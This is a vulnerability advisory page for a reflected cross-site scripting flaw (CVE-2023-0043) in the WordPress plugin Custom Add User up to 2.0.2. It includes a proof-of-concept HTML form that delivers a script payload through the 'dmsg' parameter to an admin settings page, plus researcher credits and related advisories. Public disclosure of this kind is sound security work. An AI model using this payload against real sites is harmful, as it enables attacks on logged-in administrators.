Custom Add User <= 2.0.2 – Reflected Cross-Site Scripting | CVE 2023-0043 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:10008/wp-admin/options-general.php">
      <input type="hidden" name="page" value="custom-add-user-settings" />
      <input type="hidden" name="dmsg" value="<script>alert(document.domain)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

custom-add-user

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar

Submitter

Shreya Pohekar

Submitter website

https://shreyapohekar.com

Submitter twitter

Verified

Yes

WPVDB ID

e012f23a-7daf-4ef3-b116-d0e2ed5bd0a3

Timeline

Publicly Published

2023-02-02 (about 1 years ago)

Added

2023-02-02 (about 1 years ago)

Last Updated

2023-02-02 (about 1 years ago)

Other

Published

Title

Published

2014-08-01

Title

Image Resizer - Cross Site Scripting

Published

2022-12-23

Title

ProfilePress < 4.5.1 - Admin+ Stored Cross-Site Scripting

Published

2022-03-02

Title

MC4WP < 4.8.7 - Admin+ Stored Cross-Site Scripting

Published

2023-07-20

Title

Borderless < 1.4.9 - Admin+ Stored XSS

Published

2024-04-19

Title

HelloAsso < 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting